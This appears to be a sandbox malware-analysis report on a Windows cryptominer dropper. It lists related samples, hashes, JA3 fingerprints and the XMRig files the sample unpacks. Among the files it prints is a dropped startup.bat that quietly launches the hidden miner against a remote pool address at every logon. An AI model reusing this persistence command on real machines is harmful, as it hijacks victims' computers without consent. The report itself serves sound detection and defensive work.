	https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fde	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	https://jmak-service.com/3225640388	Get hash	malicious	HTMLPhisher	Browse	151.101.194.137
	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.199.111.133
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.199.110.133
	malw.hta	Get hash	malicious	Branchlock Obfuscator	Browse	199.232.210.172
GITHUBUS	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	140.82.121.4
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	140.82.121.4
	174.exe	Get hash	malicious	Xmrig	Browse	140.82.121.3
	spreadmalware.exe	Get hash	malicious	XWorm	Browse	140.82.121.3
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse	140.82.121.4
	Customer.exe	Get hash	malicious	XWorm	Browse	140.82.121.4
	Solara Bootstrapper.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	Solara.exe	Get hash	malicious	Unknown	Browse	140.82.121.4
	https://github.com/eclipse-ecal/ecal/releases/download/v5.13.3/ecal_5.13.3-win64.exe	Get hash	malicious	Unknown	Browse	140.82.121.3
	PO#6100008 Jan04.02.2024.Xls.js	Get hash	malicious	WSHRat, STRRAT	Browse	140.82.121.4
ALTER-NET-ASZorilorNr11SfGheorgheRO	pXlV6TKi3E.exe	Get hash	malicious	Sality	Browse	89.46.234.189
	boatnet.x86	Get hash	malicious	Mirai	Browse	89.46.238.151
	jRBdJBRpya	Get hash	malicious	Mirai	Browse	89.46.234.98

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	EZZGTmJj4O.exe	Get hash	malicious	AgentTesla	Browse	185.199.110.133 140.82.121.4
	BgroUcYHpy.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.110.133 140.82.121.4
	https://my.remarkable.com/	Get hash	malicious	Unknown	Browse	185.199.110.133 140.82.121.4
	pbCN4g6sN5.exe	Get hash	malicious	DarkTortilla, Snake Keylogger, VIP Keylogger	Browse	185.199.110.133 140.82.121.4
	HVSU7GbA5N.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	185.199.110.133 140.82.121.4
	oagkiAhXgZ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	185.199.110.133 140.82.121.4
	z.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.199.110.133 140.82.121.4
	h.bat	Get hash	malicious	Abobus Obfuscator, Braodo	Browse	185.199.110.133 140.82.121.4
	web55.mp4.hta	Get hash	malicious	LummaC	Browse	185.199.110.133 140.82.121.4
	atomxml.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	185.199.110.133 140.82.121.4

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\System\process.exe (copy)	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Xmrig	Browse
	NOTIFICATION_OF_DEPENDANTS.vbs	Get hash	malicious	Xmrig	Browse
C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys	174.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse
	xmr new.exe	Get hash	malicious	Xmrig	Browse
	eth.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse
	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse
	5fr5gthkjdg71.exe	Get hash	malicious	Quasar, R77 RootKit	Browse
	aAcx14Rjtw.exe	Get hash	malicious	Xmrig	Browse
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer, Xmrig	Browse

Created / dropped Files

C:\Users\user\AppData\Local\System32\config.exe

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	8126322
Entropy (8bit):	6.498641649247061
Encrypted:	false
SSDEEP:	98304:O56TsnYXY2D3+hfleUp4K3yUlT838ZGF0k4toy7uqv1cRsD5vSGwY/S5R3HzSc3:ZMtTPtqQcU/sz
MD5:	7D6B277566CD13C79FC985CD532837AE
SHA1:	B26AABCB0E44AF091F8ADC8BD9C44CA2831B0463
SHA-256:	62F3A21DB99BCD45371CA4845C7296AF81CE3FF6F0ADCAEE3F1698317DD4898B
SHA-512:	CCB9ACCAC32C5A6E84DBFA5562462EC5ADF64C532B086167214B0D718482B3B9A9A039FB7E1443B76FA3B1D9C451E5633B985B46FB33ED1907A961993F127D9A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....yg..Z.+x....&....+.VC...Z................@.............................`[.......\|...`... ...............................................Z......Z.h.....T...............Z..j............................S.(.....................Z..............................text...(UC......VC.................`..`.data....W...pC..X...ZC.............@....rdata...:....C..<....C.............@..@.pdata........T.......S.............@..@.xdata........U.......U.............@..@.bss....P.....Z..........................idata.......Z..,...XZ.............@....CRT....h.....Z.......Z.............@....tls..........Z.......Z.............@....rsrc...h.....Z.......Z.............@..@.reloc...j....Z..l....Z.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\System32\config.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\Temp\System\process.exe (copy)

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9498112
Entropy (8bit):	6.578108590631713
Encrypted:	false
SSDEEP:	98304:L/MDwKdstleFsZ35VIRveTAXMJyoL01X6kSvcwyZk8w+vMmeAKSQjH74cGtsiZ0J:TEZ8KCbnf6sgZEFH0o
MD5:	CB166D49CE846727ED70134B589B0142
SHA1:	8F5E1C7792E9580F2B10D7BEF6DC7E63EA044688
SHA-256:	49DA580656E51214D59702A1D983EFF143AF3560A344F524FE86326C53FB5DDB
SHA-512:	A39BD86A148AF26FD31A0D171078FB7BCE0951BB8EA63658D87F6BDE97DBC214C62E8BD7152D1E621051DE8A0BA77FFD7BDA7C1106AFB740584C80E68E1912ED
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 55%
Joe Sandbox View:	Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: NOTIFICATION_OF_DEPENDANTS_1.vbs, Detection: malicious, Browse Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse Filename: NOTIFICATION_OF_DEPENDANTS.vbs, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x)'g...............*..l......1............@.............................@.......'....`... ..................................................G.......\...................p..T...............................(...................@...P............................text....l.......l.................`..`.data...`.....l.......l.............@....rdata........m.......m.............@..@.pdata..............................@..@.xdata...G...P...H...6..............@..@.bss....p.1..............................idata...G.......H...~..............@....CRT....h..........................@....tls...............................@....rsrc....\.......\.................@..@.reloc..T....p.......(..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\System\temp.zip

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=store
Category:	dropped
Size (bytes):	3784815
Entropy (8bit):	7.994197748830245
Encrypted:	true
SSDEEP:	98304:ZvRam8SCWWxe7cGMfACrorA6+UnAH48BgyIz:ZvRaNSCWWu9C0BAHGz
MD5:	5E48D84B33CC0CA0CDB29B03A875FD3A
SHA1:	597660C787259FAD45F0E69CBB64FB781333C598
SHA-256:	53B37A734AB27BB40626C6434029DEFBEBE8470F2D89B97E7CE85B40C9A3B05F
SHA-512:	A8A3D14A0FFB27FBC1A3E73C3E8DD2D0D7A35E9DC89EB14D9704D75CC9F424C539C042AE71C56197A90915A44FC19F4942C27B87AA0FEAE339B15A2853FDD3A8
Malicious:	false
Preview:	PK........ZucY................xmrig-6.22.2/PK........5ucY=...=...=.......xmrig-6.22.2/benchmark_10M.cmd@echo off.cd /d "%~dp0".xmrig.exe --bench=10M --submit.pause.PK........5ucY....<...<.......xmrig-6.22.2/benchmark_1M.cmd@echo off.cd /d "%~dp0".xmrig.exe --bench=1M --submit.pause.PK........6ucYP.V............xmrig-6.22.2/config.json.V.k.0.~._Q.\eIJ;.[.}....c......_;.n...>...V...@..;...tw.........r...D..u%....jh...P......{...........@.q>.....d......."8=2.....f.zL..y..7[y....o...b.u.\|]...^.4...^x9XO.s.6......ocPo.C@.<...;N.V,...]B7..=..P.....iR.t.`..q..K.....0</Z.....V...,..w...c?.O..+..pt.!.cD.2.e......(...l./.!w....t...sj...0z..r..w.@...x.z.....s..9.1-i GJh&....D.....q&.l..k....\....Z./:....I.1........lwX.`+!..+.....[.s..ABY.Q.@.:.T.Hul&.\|.Q$..7..:\|...k..~....r....iq......2t..\t.....0.....Kpe...^#Z...>......r?..H.[.H.B....Z...._...B.r...r..Z....L.F...{.5O..:....PQ..iw.!H_.4.+1.:0.V.T.9X..p.GV.u...Iwr.._....n......5n...%.;.T...h.n.......A....$..=r=...

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\SHA256SUMS

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	748
Entropy (8bit):	4.686342117476357
Encrypted:	false
SSDEEP:	12:luxgnoy/wHIX+XhsYyc+ATPJT5RwR4CRIh7wOtf8CuuS0mzYh/N9:Kgnoy/qIORG+d5eRdOt1ud0Rh/N9
MD5:	B6573B6DC861AD762878DCADFD5D4831
SHA1:	272F6D841FCD0E7E9314C309EFFB2E4703E67531
SHA-256:	8014B5151C64745FADF58E6A0BC09EE2309FB48900FE5976714D1A6EC62E96C6
SHA-512:	33162B13B2F1D612774208BB3C4207CD2C31D8E05C36BB73ED1DD6A5BD1CBAC95847D5E4842D8B64771FDA17AC70ED3A87A29CCD8E9E1C88F71FBFE2C69BFC77
Malicious:	false
Preview:	11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5 WinRing0x64.sys.235a64e3520b1c2c27763122b303f78aee8d7c083dfd9f1eb936cd5174383609 benchmark_10M.cmd.d7747e7a3c782009f4ceb6e9c106115876386853929563b509da5258e3968d15 benchmark_1M.cmd.2b03943244871ca75e44513e4d20470b8f3e0f209d185395de82b447022437ec config.json.e73491065d86b1ad69229bb5d2019e08b947e11a2a57adf5c2d9a2b5d8f4acad pool_mine_example.cmd.810614290bdb14d2ddf10f65f8adc988a8272764f2a9e2c378e52fad162da344 rtm_ghostrider_example.cmd.33497c69c21fa96bbc96f1d7f09608e462f8ab22555364977c0bd35fef27bc29 solo_mine_example.cmd.8e70ef38fe14a2ee2848df3d6f7e260d1caf8cfc15de694d678b8af151d62333 start.cmd.49da580656e51214d59702a1d983eff143af3560a344f524fe86326c53fb5ddb *xmrig.exe.

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\WinRing0x64.sys

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	modified
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 174.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 47SXvEQ.exe, Detection: malicious, Browse Filename: xmr new.exe, Detection: malicious, Browse Filename: eth.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: hiwA7Blv7C.exe, Detection: malicious, Browse Filename: 5fr5gthkjdg71.exe, Detection: malicious, Browse Filename: aAcx14Rjtw.exe, Detection: malicious, Browse Filename: SharcHack.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\benchmark_10M.cmd

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	61
Entropy (8bit):	4.738457731772711
Encrypted:	false
SSDEEP:	3:mKDD3M/PKXD0dAyIgytoyrIJnn:h7dXD0frsoD
MD5:	5BE1C4CACB5AE37C43527E99A097DC7A
SHA1:	1B2F00FEFDE9D601764D5D26D5E0FB2B9F58074C
SHA-256:	235A64E3520B1C2C27763122B303F78AEE8D7C083DFD9F1EB936CD5174383609
SHA-512:	20A9E18BC397FE86514875AF4213A02A5831A27671370849F05C2F3BA048BC29FC41CA96F0CB1CC08AAFF27BBEBF637F30D2EE798CB80ED03080E8C7D8F2D9A1
Malicious:	false
Preview:	@echo off.cd /d "%~dp0".xmrig.exe --bench=10M --submit.pause.

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\benchmark_1M.cmd

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.7280729963885095
Encrypted:	false
SSDEEP:	3:mKDD3M/PKXD0dAyIgydsJnn:h7dXD0frZ
MD5:	CBA1927CF6959DC99ECBD0C553E4DB6F
SHA1:	7F2D59CFDF2B0550D22AC54D0B1FA5AC8F8B5F57
SHA-256:	D7747E7A3C782009F4CEB6E9C106115876386853929563B509DA5258E3968D15
SHA-512:	C78AB9B017153C497EF2D0F568ADE265AE9B60238EBDB36D8EF7ECC4D232CD90FD5FDC5B600BB26437466C7300E571B95B4FF92A7F024A981A02196A14D6E3F1
Malicious:	false
Preview:	@echo off.cd /d "%~dp0".xmrig.exe --bench=1M --submit.pause.

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2346
Entropy (8bit):	3.9745770321342144
Encrypted:	false
SSDEEP:	48:CtWTHcfLWHW8b9b2lZ9lDf1C59ECoECyo12udQtJtKD57:CtWTGyH8CgCZCN2ua+DB
MD5:	66F38C96A4901E7B345787C447842B3E
SHA1:	2AA9B4D1BD2EDD5D81BD9725E9318EDAEE67531F
SHA-256:	2B03943244871CA75E44513E4D20470B8F3E0F209D185395DE82B447022437EC
SHA-512:	71757FAD29D6D2A257362ED28CDE9F249CC8A14E646DEE666C9029EA97C72DE689CDF8ED5CF0365195A6A6831FE77D82EFE5E2FA555C6CC5078F1F29AE8DD68F
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\config.json, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	{. "api": {. "id": null,. "worker-id": null. },. "http": {. "enabled": false,. "host": "127.0.0.1",. "port": 0,. "access-token": null,. "restricted": true. },. "autosave": true,. "background": false,. "colors": true,. "title": true,. "randomx": {. "init": -1,. "init-avx2": -1,. "mode": "auto",. "1gb-pages": false,. "rdmsr": true,. "wrmsr": true,. "cache_qos": false,. "numa": true,. "scratchpad_prefetch_mode": 1. },. "cpu": {. "enabled": true,. "huge-pages": true,. "huge-pages-jit": false,. "hw-aes": null,. "priority": null,. "memory-pool": false,. "yield": true,. "max-threads-hint": 100,. "asm": true,. "argon2-impl": null,. "cn/0": false,. "cn-lite/0": false. },. "opencl": {. "enabled": false,. "cache": true,. "loader": null,.

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\pool_mine_example.cmd

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1023
Entropy (8bit):	4.944208285706554
Encrypted:	false
SSDEEP:	24:knECAL1ACWm4Vw5fP5t59XMaoGaK8IZAR0x+FcU71Mtzkz7CQhvvFIVV+XD/Ve:8ErG58pPS5GapIWG+Fcc1Vz7LhvvMVwM
MD5:	2E737F5C3AF9C8AA5216DFDC5BE02CC6
SHA1:	05FE2040AEA6F6CFF25DEAF5CA2CA6793FAA64C7
SHA-256:	E73491065D86B1AD69229BB5D2019E08B947E11A2A57ADF5C2D9A2B5D8F4ACAD
SHA-512:	CE0E12A544623458F5905EA20F2B6F0E75CFB57ADD912290FBF2611EDDBE98DE7FFED3C9E650747967B2620E5EBBE33E249CBD60E7032BDB10C909CC516709CA
Malicious:	false
Preview:	:: Example batch file for mining Monero at a pool.::.:: Format:.::.xmrig.exe -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.::.pool address..The host name of the pool stratum or its IP address, for example pool.hashvault.pro.::.pool port ..The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..::.pool username/wallet .For most pools, this is the wallet address you want to mine to. Some pools require a username.::.pool password ..For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Monero mining pools:.::.https://miningpoolstats.stream/monero.::.:: Choose pools outside of top 5 to help Monero network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd /d "%~dp0".xmrig.exe -o xmrpool.eu:3333 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdU

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\rtm_ghostrider_example.cmd

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1220
Entropy (8bit):	4.575573022986975
Encrypted:	false
SSDEEP:	24:knTXzrL1ACvs4VYt5ONwvoGsPZAR0x+FcVtUtzH37CQhvvPI5E9c6I5E/Ywke:8T3G4HWPnwGsPWG+FcVK7LhvvPOMOoNt
MD5:	3F0155ABE745BE1F6089EAFC4F517AC8
SHA1:	277F510CEB62B277B141D094C82EEDEBDC6F3A35
SHA-256:	810614290BDB14D2DDF10F65F8ADC988A8272764F2A9E2C378E52FAD162DA344
SHA-512:	8DEF46852A962FF5DBED94E01F8D23019EF401A718D9C5A440D12B2FFA369539BE328F165F68CCC2098CD5E5C939BCB5F784F877BDD7B9D939393BBD2229D19E
Malicious:	false
Preview:	:: Example batch file for mining Raptoreum at a pool.::.:: Format:.:: xmrig.exe -a gr -o <pool address>:<pool port> -u <pool username/wallet> -p <pool password>.::.:: Fields:.:: pool address The host name of the pool stratum or its IP address, for example raptoreumemporium.com.:: pool port The port of the pool's stratum to connect to, for example 3333. Check your pool's getting started page..:: pool username/wallet For most pools, this is the wallet address you want to mine to. Some pools require a username.:: pool password For most pools this can be just 'x'. For pools using usernames, you may need to provide a password as configured on the pool..::.:: List of Raptoreum mining pools:.:: https://miningpoolstats.stream/raptoreum.::.:: Choose pools outside of top 5 to help Raptoreum network be more decentralized!.:: Smaller pools also often have smaller fees/payout limits...cd /d "%~dp0".:: Use this command line to conne

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\solo_mine_example.cmd

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	821
Entropy (8bit):	5.147610259279037
Encrypted:	false
SSDEEP:	24:knTC6jGoTcC6gaO8oAZvfa6Tz7nR7O+ORxAIHnV+XD/X:8TdNAzOr0a6Tz7nR7OhzVwX
MD5:	090703E56F46330ED625AC4363C9D25C
SHA1:	6CE0B265E0860F1913F4BB37A17AA7EDA88641C5
SHA-256:	33497C69C21FA96BBC96F1D7F09608E462F8AB22555364977C0BD35FEF27BC29
SHA-512:	1CD8C43287508C9393300D5A22C565D2F4BD98493A203112FD727518A4E439EB74035D18FE1F52E2D3594305A841CA93FCD0E3C61634F0992CFD3FC253872F19
Malicious:	false
Preview:	:: Example batch file for mining Monero solo.::.:: Format:.::.xmrig.exe -o <node address>:<node port> -a rx/0 -u <wallet address> --daemon.::.:: Fields:.::.node address..The host name of your monerod node or its IP address. It can also be a public node with RPC enabled, for example node.xmr.to.::.node port ..The RPC port of your monerod node to connect to, usually 18081..::.wallet address..Check your Monero CLI or GUI wallet to see your wallet's address..::.:: Mining solo is the best way to help Monero network be more decentralized!.:: But you will only get a payout when you find a block which can take more than a year for a single low-end PC...cd /d "%~dp0".xmrig.exe -o YOUR_NODE_IP:18081 -a rx/0 -u 48edfHu7V9Z84YzzMa6fUueoELZ9ZRXq9VetWzYGzKt52XU5xvqgzYnDK9URnRoJMk1j8nLwEVsaSWJ4fhdUyZijBGUicoD --daemon.pause.

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\start.cmd

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	44
Entropy (8bit):	4.42511855035714
Encrypted:	false
SSDEEP:	3:mKDDVBF//IyXQdAoWQIv:hyEQzIv
MD5:	EAF3A00CC0465F8AF471B849ADA29843
SHA1:	3042E97874706189AA9704D77C9E74A94E519106
SHA-256:	8E70EF38FE14A2EE2848DF3D6F7E260D1CAF8CFC15DE694D678B8AF151D62333
SHA-512:	56B9F3991AE4BAD5E06097D095931E746E6B2AC955649A5C793D9F4F6861C6FFC9316B063C34D7A8079AF201354C87BF3008BC0FD4321E59B27E1D8120B078CF
Malicious:	false
Preview:	@echo off..cd /d "%~dp0"..xmrig.exe..pause..

C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	9498112
Entropy (8bit):	6.578108590631713
Encrypted:	false
SSDEEP:	98304:L/MDwKdstleFsZ35VIRveTAXMJyoL01X6kSvcwyZk8w+vMmeAKSQjH74cGtsiZ0J:TEZ8KCbnf6sgZEFH0o
MD5:	CB166D49CE846727ED70134B589B0142
SHA1:	8F5E1C7792E9580F2B10D7BEF6DC7E63EA044688
SHA-256:	49DA580656E51214D59702A1D983EFF143AF3560A344F524FE86326C53FB5DDB
SHA-512:	A39BD86A148AF26FD31A0D171078FB7BCE0951BB8EA63658D87F6BDE97DBC214C62E8BD7152D1E621051DE8A0BA77FFD7BDA7C1106AFB740584C80E68E1912ED
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, Author: Joe Security Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, Author: unknown Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, Author: unknown Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, Author: Florian Roth Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\System\xmrig-6.22.2\xmrig.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 55%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...x)'g...............*..l......1............@.............................@.......'....`... ..................................................G.......\...................p..T...............................(...................@...P............................text....l.......l.................`..`.data...`.....l.......l.............@....rdata........m.......m.............@..@.pdata..............................@..@.xdata...G...P...H...6..............@..@.bss....p.1..............................idata...G.......H...~..............@....CRT....h..........................@....tls...............................@....rsrc....\.......\.................@..@.reloc..T....p.......(..............@..B........................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\startup.bat

Download File

Process:	C:\Users\user\Desktop\pTVKHqys2h.exe
File Type:	DOS batch file, ASCII text
Category:	modified
Size (bytes):	263
Entropy (8bit):	4.8857238066420114
Encrypted:	false
SSDEEP:	6:hXp923f2aQBUZvzdMI0H6pdqBgv1PhfMqJB:k3dxSHqr1ZkS
MD5:	7B27720D48A427B8A2812BD92ADCFA8C
SHA1:	48D4C2AD06C2D9CA49ECE85408B73BFC3528B910
SHA-256:	50FEA6CD06E0E0168C6E11C0E69ACBB3B448A49FA6597ECFE0C49FE25B2B063F
SHA-512:	F0216C245DC9A3C98A4E32BDF0417D9ABDB820A086B5181B0193BD9E3AA11F4442CAD2D06DB13E46FAE476889C26FA8A957713E47DFAC68A7458D72CF49994F9
Malicious:	true
Preview:	@echo off.start /min "" "C:\Users\user\AppData\Local\Temp\System\process.exe" -o 93.115.172.41:1300 -a rx -k --tls --rig-id user --cpu-priority 2 --cpu-max-threads-hint 45 --randomx-mode light --donate-level 0 --cpu-affinity 1 --max-cpu-usage 10 --background.

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):	6.498641649247061
TrID:	Win64 Executable (generic) (12005/4) 74.95% Generic Win/DOS Executable (2004/3) 12.51% DOS Executable Generic (2002/1) 12.50% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:	pTVKHqys2h.exe
File size:	8'126'322 bytes
MD5:	7d6b277566cd13c79fc985cd532837ae
SHA1:	b26aabcb0e44af091f8adc8bd9c44ca2831b0463
SHA256:	62f3a21db99bcd45371ca4845c7296af81ce3ff6f0adcaee3f1698317dd4898b
SHA512:	ccb9accac32c5a6e84dbfa5562462ec5adf64c532b086167214b0d718482b3b9a9a039fb7e1443b76fa3b1d9c451e5633b985b46fb33ed1907a961993f127d9a
SSDEEP:	98304:O56TsnYXY2D3+hfleUp4K3yUlT838ZGF0k4toy7uqv1cRsD5vSGwY/S5R3HzSc3:ZMtTPtqQcU/sz
TLSH:	B4868D03E5A559ACCA9FD634869EA336FB753C494232FABB0674C7312D22B819F1D314
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....yg..Z.+x....&....+.VC...Z................@.............................`[.......\|...`... ............................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x1400013d0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
